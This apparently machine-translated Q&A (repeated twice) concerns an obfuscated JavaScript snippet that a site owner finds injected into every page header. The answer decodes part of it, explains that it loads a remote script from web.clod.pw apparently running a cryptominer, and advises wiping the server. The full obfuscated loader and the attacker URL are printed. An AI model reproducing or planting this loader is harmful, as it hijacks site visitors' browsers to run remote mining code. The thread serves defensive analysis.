黑客、脚本、恶意软件、解码器?
Hack, script, malicious, decoder?
我在我网站的每个页面的头部都有这个...问题,如何解码它以了解它的作用?
这是代码:
<script>
$ = ~[];
$ = {
___: ++$,
$$$$: (![] + "")[$],
__$: ++$,
$_$_: (![] + "")[$],
_$_: ++$,
$_$$: ({} + "")[$],
$$_$: ($[$] + "")[$],
_$$: ++$,
$$$_: (!"" + "")[$],
$__: ++$,
$_$: ++$,
$$__: ({} + "")[$],
$$_: ++$,
$$$: ++$,
$___: ++$,
$__$: ++$
};
$.$_ = ($.$_ = $ + "")[$.$_$] + ($._$ = $.$_[$.__$]) + ($.$$ = ($.$ + "")[$.__$]) + ((!$) + "")[$._$$] + ($.__ = $.$_[$.$$_]) + ($.$ = (!"" + "")[$.__$]) + ($._ = (!"" + "")[$._$_]) + $.$_[$.$_$] + $.__ + $._$ + $.$;
$.$$ = $.$ + (!"" + "")[$._$$] + $.__ + $._ + $.$ + $.$$;
$.$ = ($.___)[$.$_][$.$_];
$.$($.$($.$$ + "\"" + "\" + $.__$ + $.$$_ + $.$$_ + $.$_$_ + "\" + $.__$ + $.$$_ + $._$_ + "\" + $.$__ + $.___ + $.$$$_ + (![] + "")[$._$_] + "\" + $.$__ + $.___ + "=\" + $.$__ + $.___ + $.$$_$ + $._$ + $.$$__ + $._ + "\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "\" + $.__$ + $.$_$ + $.$$_ + $.__ + "." + $.$$__ + "\" + $.__$ + $.$$_ + $._$_ + $.$$$_ + $.$_$_ + $.__ + $.$$$_ + "\" + $.__$ + $.___ + $.$_$ + (![] + "")[$._$_] + $.$$$_ + "\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "\" + $.__$ + $.$_$ + $.$$_ + $.__ + "('\" + $.__$ + $.$$_ + $._$$ + $.$$__ + "\" + $.__$ + $.$$_ + $._$_ + "\" + $.__$ + $.$_$ + $.__$ + "\" + $.__$ + $.$$_ + $.___ + $.__ + "');" + $.$$$_ + (![] + "")[$._$_] + ".\" + $.__$ + $.$$_ + $._$$ + "\" + $.__$ + $.$$_ + $._$_ + $.$$__ + "='\" + $.__$ + $.$_$ + $.___ + $.__ + $.__ + "\" + $.__$ + $.$$_ + $.___ + "\" + $.__$ + $.$$_ + $._$$ + "://\" + $.__$ + $.$$_ + $.$$$ + $.$$$_ + $.$_$$ + "." + $.$$__ + (![] + "")[$._$_] + $._$ + $.$$_$ + ".\" + $.__$ + $.$$_ + $.___ + "\" + $.__$ + $.$$_ + $.$$$ + "/\" + $.__$ + $.$_$ + $._$_ + "\" + $.__$ + $.$$_ + $._$$ + "/\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.__$ + $.___ + "\" + $.__$ + $.__$ + $.___ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $.$$_ + $.$$$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $.$__ + $.$$$ + (![] + "")[$._$_] + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $._$$ + $.___ + "\" + $.__$ + $.$__ + $.$$$ + $.___ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $._$_ + $._$$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $._$_ + $.$$$ + "\" + $.__$ + $.$$$ + $.__$ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $._$_ + $.__$ + $.$_$ + $.$$_$ + "\" + $.__$ + $.$$$ + $.___ + "\" + $.__$ + $.___ + $.$$$ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $._$_ + $.$__ + "\" + $.__$ + $.__$ + $.$$_ + "\" + $.__$ + $._$_ + $.$__ + $.$___ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $.___ + $.$$$ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $._$_ + $.$__ + $.___ + "\" + $.__$ + $.$$$ + $._$_ + "\" + $.__$ + $._$_ + $.___ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.$_$ + $._$_ + "\" + $.__$ + $.___ + $._$$ + $.__ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $.___ + $.$_$ + $._$_ + "\" + $.__$ + $.__$ + $.$$_ + "\" + $.__$ + $.$$$ + $._$_ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.__$ + $._$_ + "\" + $.__$ + $._$_ + $._$$ + "\" + $.__$ + $.__$ + $.__$ + "\" + $.__$ + $._$_ + $.___ + "\" + $.__$ + $._$_ + $.__$ + $.___ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $.__$ + $._$_ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $._$_ + $.$__ + "\" + $.__$ + $.__$ + $._$$ + "_\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.__$ + $._$_ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.$$$ + $.___ + "\" + $.__$ + $.__$ + $.__$ + "\" + $.__$ + $.___ + $.$$$ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.$_$ + $._$$ + "\" + $.__$ + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $._$$ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.__$ + $.__$ + "\" + $.__$ + $.$_$ + $.___ + "\" + $.__$ + $._$_ + $.___ + "\" + $.__$ + $._$_ + $.___ + $.$$__ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.$$_ + $.__$ + "\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $.___ + $.$_$ + $.$$_$ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $._$_ + $.__$ + $.$$__ + "\" + $.__$ + $.$$_ + $._$$ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.$_$ + $._$$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $.__$ + $._$_ + "\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.$$$ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$$ + $.___ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $._$_ + $.___ + "\" + $.__$ + $.__$ + $.$$_ + $.$$__ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.__$ + $.$__ + $.$_$_ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.$_$ + $.$_$ + $.$__ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $._$$ + $._$_ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $.$$_ + $.$$_$ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.__$ + $.$_$ + "\" + $.__$ + $.___ + $.$$$ + "\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$$ + $.___ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.$$$ + $.___ + "\" + $.__$ + $.$$_ + $.$$$ + $.$_$_ + ".\" + $.__$ + $.$_$ + $._$_ + "\" + $.__$ + $.$$_ + $._$$ + "?" + $.__ + "\" + $.__$ + $.$$_ + $._$_ + (![] + "")[$._$_] + "=" + $.___ + "." + $._$$ + $.___ + "';" + $.$$_$ + $._$ + $.$$__ + $._ + "\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "\" + $.__$ + $.$_$ + $.$$_ + $.__ + ".\" + $.__$ + $.$_$ + $.___ + $.$$$_ + $.$_$_ + $.$$_$ + "." + $.$_$_ + "\" + $.__$ + $.$$_ + $.___ + "\" + $.__$ + $.$$_ + $.___ + $.$$$_ + "\" + $.__$ + $.$_$ + $.$$_ + $.$$_$ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $.$_$ + $.___ + "\" + $.__$ + $.$_$ + $.__$ + (![] + "")[$._$_] + $.$$_$ + "(" + $.$$$_ + (![] + "")[$._$_] + ");" + "\"")())();
</script>
我能够对其中的大部分内容进行去混淆处理。它的最后一点是创建一个函数,该函数将创建一个脚本标记,将其插入到您的 DOM 中,然后将 src 设置为以下 url:
https://web.clod.pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.30
加载接缝以尝试加载加密矿工的脚本,因为其源代码中的一些关键内容是:WebMiner 和 runMiner().
我只想说:
- 关闭你的服务器
- 擦除您的服务器
- 并从备份恢复
这看起来真的很邪恶。它被混淆了,第一位只是用来创建一些可以使用的关键字。最后一行是重要的一点,我相信它正在尝试创建一个 Function 将 return 从全局中提取一些 unicode 字符串。到目前为止,这是我反混淆的内容:
$ = ~[]; // -1
$ = {
___: ++$, // 0
$$$$: (![] + "")[$], // 'f'
__$: ++$, // 1
$_$_: (![] + "")[$], // 'a'
_$_: ++$, // 2
$_$$: ({} + "")[$], // 'b'
$$_$: ($[$] + "")[$], // 'd'
_$$: ++$, // 3
$$$_: (!"" + "")[$], // 'e'
$__: ++$, // 4
$_$: ++$, // 5
$$__: ({} + "")[$], // 'c'
$$_: ++$, // 6
$$$: ++$, // 7
$___: ++$, // 8
$__$: ++$ // 9
};
$.$_ = // 'constructor'
($.$_ = $ + "")[$.$_$] + // 'c'
($._$ = $.$_[$.__$]) + // 'o'
($.$$ = ($.$ + "")[$.__$]) + // 'n'
((!$) + "")[$._$$] + // 's'
($.__ = $.$_[$.$$_]) + // 't'
($.$ = (!"" + "")[$.__$]) + // 'r'
($._ = (!"" + "")[$._$_]) + // 'u'
$.$_[$.$_$] + // 'c'
$.__ + // 't'
$._$ + // 'o'
$.$; // 'r'
$.$$ = // 'return'
$.$ + // 'r'
(!"" + "")[$._$$] + // 'e'
$.__ + // 't'
$._ + // 'u'
$.$ + // 'r'
$.$$; // 'n'
$.$ = ($.___)[$.$_][$.$_]; // (Number).constructor.constructor
// This is where the actual function is created and called to download another script off of another domain.
$.$(
$.$(
// A whole lot of unicode shenanigans
)()
)();
我在我网站的每个页面的头部都有这个...问题,如何解码它以了解它的作用?
这是代码:
<script>
$ = ~[];
$ = {
___: ++$,
$$$$: (![] + "")[$],
__$: ++$,
$_$_: (![] + "")[$],
_$_: ++$,
$_$$: ({} + "")[$],
$$_$: ($[$] + "")[$],
_$$: ++$,
$$$_: (!"" + "")[$],
$__: ++$,
$_$: ++$,
$$__: ({} + "")[$],
$$_: ++$,
$$$: ++$,
$___: ++$,
$__$: ++$
};
$.$_ = ($.$_ = $ + "")[$.$_$] + ($._$ = $.$_[$.__$]) + ($.$$ = ($.$ + "")[$.__$]) + ((!$) + "")[$._$$] + ($.__ = $.$_[$.$$_]) + ($.$ = (!"" + "")[$.__$]) + ($._ = (!"" + "")[$._$_]) + $.$_[$.$_$] + $.__ + $._$ + $.$;
$.$$ = $.$ + (!"" + "")[$._$$] + $.__ + $._ + $.$ + $.$$;
$.$ = ($.___)[$.$_][$.$_];
$.$($.$($.$$ + "\"" + "\" + $.__$ + $.$$_ + $.$$_ + $.$_$_ + "\" + $.__$ + $.$$_ + $._$_ + "\" + $.$__ + $.___ + $.$$$_ + (![] + "")[$._$_] + "\" + $.$__ + $.___ + "=\" + $.$__ + $.___ + $.$$_$ + $._$ + $.$$__ + $._ + "\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "\" + $.__$ + $.$_$ + $.$$_ + $.__ + "." + $.$$__ + "\" + $.__$ + $.$$_ + $._$_ + $.$$$_ + $.$_$_ + $.__ + $.$$$_ + "\" + $.__$ + $.___ + $.$_$ + (![] + "")[$._$_] + $.$$$_ + "\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "\" + $.__$ + $.$_$ + $.$$_ + $.__ + "('\" + $.__$ + $.$$_ + $._$$ + $.$$__ + "\" + $.__$ + $.$$_ + $._$_ + "\" + $.__$ + $.$_$ + $.__$ + "\" + $.__$ + $.$$_ + $.___ + $.__ + "');" + $.$$$_ + (![] + "")[$._$_] + ".\" + $.__$ + $.$$_ + $._$$ + "\" + $.__$ + $.$$_ + $._$_ + $.$$__ + "='\" + $.__$ + $.$_$ + $.___ + $.__ + $.__ + "\" + $.__$ + $.$$_ + $.___ + "\" + $.__$ + $.$$_ + $._$$ + "://\" + $.__$ + $.$$_ + $.$$$ + $.$$$_ + $.$_$$ + "." + $.$$__ + (![] + "")[$._$_] + $._$ + $.$$_$ + ".\" + $.__$ + $.$$_ + $.___ + "\" + $.__$ + $.$$_ + $.$$$ + "/\" + $.__$ + $.$_$ + $._$_ + "\" + $.__$ + $.$$_ + $._$$ + "/\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.__$ + $.___ + "\" + $.__$ + $.__$ + $.___ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $.$$_ + $.$$$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $.$__ + $.$$$ + (![] + "")[$._$_] + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $._$$ + $.___ + "\" + $.__$ + $.$__ + $.$$$ + $.___ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $._$_ + $._$$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $._$_ + $.$$$ + "\" + $.__$ + $.$$$ + $.__$ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $._$_ + $.__$ + $.$_$ + $.$$_$ + "\" + $.__$ + $.$$$ + $.___ + "\" + $.__$ + $.___ + $.$$$ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $._$_ + $.$__ + "\" + $.__$ + $.__$ + $.$$_ + "\" + $.__$ + $._$_ + $.$__ + $.$___ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $.___ + $.$$$ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $._$_ + $.$__ + $.___ + "\" + $.__$ + $.$$$ + $._$_ + "\" + $.__$ + $._$_ + $.___ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.$_$ + $._$_ + "\" + $.__$ + $.___ + $._$$ + $.__ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $.___ + $.$_$ + $._$_ + "\" + $.__$ + $.__$ + $.$$_ + "\" + $.__$ + $.$$$ + $._$_ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.__$ + $._$_ + "\" + $.__$ + $._$_ + $._$$ + "\" + $.__$ + $.__$ + $.__$ + "\" + $.__$ + $._$_ + $.___ + "\" + $.__$ + $._$_ + $.__$ + $.___ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $.__$ + $._$_ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $._$_ + $.$__ + "\" + $.__$ + $.__$ + $._$$ + "_\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.__$ + $._$_ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.$$$ + $.___ + "\" + $.__$ + $.__$ + $.__$ + "\" + $.__$ + $.___ + $.$$$ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.$_$ + $._$$ + "\" + $.__$ + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $.___ + $.$__ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $._$$ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.__$ + $.__$ + "\" + $.__$ + $.$_$ + $.___ + "\" + $.__$ + $._$_ + $.___ + "\" + $.__$ + $._$_ + $.___ + $.$$__ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.$$_ + $.__$ + "\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $.___ + $.$$_ + "\" + $.__$ + $.___ + $.$_$ + $.$$_$ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $._$_ + $.__$ + $.$$__ + "\" + $.__$ + $.$$_ + $._$$ + "\" + $.__$ + $._$_ + $.$_$ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.$_$ + $._$$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $._$_ + "\" + $.__$ + $.__$ + $._$_ + "\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.$$$ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$$ + $.___ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.___ + $._$_ + "\" + $.__$ + $._$_ + $.___ + "\" + $.__$ + $.__$ + $.$$_ + $.$$__ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.__$ + $.$__ + $.$_$_ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $.$$_ + "\" + $.__$ + $.$_$ + $.$_$ + $.$__ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $._$$ + $._$_ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$_ + $.$$_ + $.$$_$ + "\" + $.__$ + $.___ + $.$_$ + "\" + $.__$ + $.__$ + $.$_$ + "\" + $.__$ + $.___ + $.$$$ + "\" + $.__$ + $._$$ + $.__$ + "\" + $.__$ + $.___ + $.__$ + "\" + $.__$ + $._$$ + $.___ + "\" + $.__$ + $._$_ + $.__$ + "\" + $.__$ + $.$$$ + $.___ + "\" + $.__$ + $.$$_ + $.$$$ + $.$_$_ + ".\" + $.__$ + $.$_$ + $._$_ + "\" + $.__$ + $.$$_ + $._$$ + "?" + $.__ + "\" + $.__$ + $.$$_ + $._$_ + (![] + "")[$._$_] + "=" + $.___ + "." + $._$$ + $.___ + "';" + $.$$_$ + $._$ + $.$$__ + $._ + "\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "\" + $.__$ + $.$_$ + $.$$_ + $.__ + ".\" + $.__$ + $.$_$ + $.___ + $.$$$_ + $.$_$_ + $.$$_$ + "." + $.$_$_ + "\" + $.__$ + $.$$_ + $.___ + "\" + $.__$ + $.$$_ + $.___ + $.$$$_ + "\" + $.__$ + $.$_$ + $.$$_ + $.$$_$ + "\" + $.__$ + $.___ + $._$$ + "\" + $.__$ + $.$_$ + $.___ + "\" + $.__$ + $.$_$ + $.__$ + (![] + "")[$._$_] + $.$$_$ + "(" + $.$$$_ + (![] + "")[$._$_] + ");" + "\"")())();
</script>
我能够对其中的大部分内容进行去混淆处理。它的最后一点是创建一个函数,该函数将创建一个脚本标记,将其插入到您的 DOM 中,然后将 src 设置为以下 url:
https://web.clod.pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.30
加载接缝以尝试加载加密矿工的脚本,因为其源代码中的一些关键内容是:WebMiner 和 runMiner().
我只想说:
- 关闭你的服务器
- 擦除您的服务器
- 并从备份恢复
这看起来真的很邪恶。它被混淆了,第一位只是用来创建一些可以使用的关键字。最后一行是重要的一点,我相信它正在尝试创建一个 Function 将 return 从全局中提取一些 unicode 字符串。到目前为止,这是我反混淆的内容:
$ = ~[]; // -1
$ = {
___: ++$, // 0
$$$$: (![] + "")[$], // 'f'
__$: ++$, // 1
$_$_: (![] + "")[$], // 'a'
_$_: ++$, // 2
$_$$: ({} + "")[$], // 'b'
$$_$: ($[$] + "")[$], // 'd'
_$$: ++$, // 3
$$$_: (!"" + "")[$], // 'e'
$__: ++$, // 4
$_$: ++$, // 5
$$__: ({} + "")[$], // 'c'
$$_: ++$, // 6
$$$: ++$, // 7
$___: ++$, // 8
$__$: ++$ // 9
};
$.$_ = // 'constructor'
($.$_ = $ + "")[$.$_$] + // 'c'
($._$ = $.$_[$.__$]) + // 'o'
($.$$ = ($.$ + "")[$.__$]) + // 'n'
((!$) + "")[$._$$] + // 's'
($.__ = $.$_[$.$$_]) + // 't'
($.$ = (!"" + "")[$.__$]) + // 'r'
($._ = (!"" + "")[$._$_]) + // 'u'
$.$_[$.$_$] + // 'c'
$.__ + // 't'
$._$ + // 'o'
$.$; // 'r'
$.$$ = // 'return'
$.$ + // 'r'
(!"" + "")[$._$$] + // 'e'
$.__ + // 't'
$._ + // 'u'
$.$ + // 'r'
$.$$; // 'n'
$.$ = ($.___)[$.$_][$.$_]; // (Number).constructor.constructor
// This is where the actual function is created and called to download another script off of another domain.
$.$(
$.$(
// A whole lot of unicode shenanigans
)()
)();